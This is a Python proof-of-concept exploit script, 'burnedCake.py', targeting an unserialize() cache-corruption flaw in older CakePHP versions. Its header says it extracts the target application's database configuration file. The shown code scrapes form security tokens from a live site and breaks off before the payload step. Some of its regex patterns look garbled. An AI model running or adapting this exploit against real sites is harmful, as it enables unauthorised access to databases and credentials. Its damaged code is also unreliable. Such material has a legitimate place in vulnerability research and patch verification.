#!/usr/bin/python # # burnedCake.py - CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit # written by [email protected] # # This code exploits a unserialize() vulnerability in the CakePHP security # component. See http://malloc.im/CakePHP-unserialize.txt for a detailed # analysis of the vulnerability. # # The exploit should work against every CakePHP based Application, that # uses POST forms with security tokens and hasn't changed the Cache # configuration (file-system caching is standard). Exploiting # other caching configurations is possible but not as elegant. # # This POC will output the database config file of the running CakePHP Application, # other payloads are easily possibe with a changed PHP Code. from optparse import OptionParser from urlparse import urlparse,urljoin import urllib2 import urllib import re def request(url,data="",headers={},debug=0): if (data==""): request = urllib2.Request(url=url,headers=headers) else: request = urllib2.Request(url=url,headers=headers,data=data) debug_handler = urllib2.HTTPHandler(debuglevel = debug) opener = urllib2.build_opener(debug_handler) response=opener.open(request) return response if __name__=="__main__": parser = OptionParser(usage="usage: %prog [options] url") parser.add_option("-p", "--post", dest="post", help="additional post content as urlencoded string") parser.add_option("-v", action="store_true", dest="verbose", help="verbose mode") (options, args) = parser.parse_args() if len(args)!=1: parser.error("wrong number of arguments") if options.verbose: debug=1 else: debug=0 if not options.post: options.post="" url=urlparse(args[0]) html=request(url.geturl(),debug=debug ).read() try: key=re.search("data/[_Token/]/[key/]/" value=/"(.*?)/"",html).group(1) path=re.search('method="post" action="(.*?)"',html).group(1) fields=re.search('data/[_Token/]/[fields/]" value="([0-9a-f]{32}).*?"',html).group(1) except: print "[x] Regex failed! :(" exit()
评论